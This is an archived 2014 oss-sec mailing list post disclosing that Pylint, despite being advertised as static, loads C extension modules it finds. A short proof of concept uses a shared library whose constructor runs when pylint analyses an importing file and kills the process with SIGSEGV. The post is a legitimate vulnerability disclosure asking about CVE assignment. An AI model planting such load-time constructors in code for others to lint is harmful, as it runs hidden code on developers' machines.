oss-sec mailing list archives
Pylint checks not as static as one would think
From: Jakub Wilk <jwilk () jwilk net>
Date: Mon, 29 Sep 2014 14:32:21 +0200
Pylint[0] is advertised as "a static code checker, meaning it can analyse your code without actually running it"[1] and that it "does not import live modules"[1].
This is, unfortunately, far from reality. Here's a PoC: $ cat moo.py from _moo import * $ cat moo.c #include <stdio.h> #include <signal.h> void __attribute__((constructor)) moo() { printf("moo!\n"); kill(0, SIGSEGV); } $ gcc -Wall -shared -fPIC moo.c -o _moo.so $ pylint moo.py No config file found, using default configuration moo! Segmentation faultMy understanding is that upstream Pylint maintainers consider this behavior intentional[2]. But even then, I think it's a serious documentation flaw.
Should a CVE ID be assigned to this bug? If yes, it should be a CVE-2010-XXXX.
[0] http://www.pylint.org/ [1] http://docs.pylint.org/faq.html#about-pylint [2] https://bugs.debian.org/591676#28 -- Jakub Wilk
Current thread:
- Pylint checks not as static as one would think Jakub Wilk (Sep 29)
- Re: Pylint checks not as static as one would think cve-assign (Sep 29)